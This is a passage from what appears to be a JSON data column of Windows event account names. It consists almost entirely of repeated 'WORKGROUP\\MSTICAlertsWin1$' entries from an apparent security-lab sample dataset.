ROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NT AUTHORITY\\\\LOCAL SERVICE\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NT AUTHORITY\\\\LOCAL SERVICE\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKG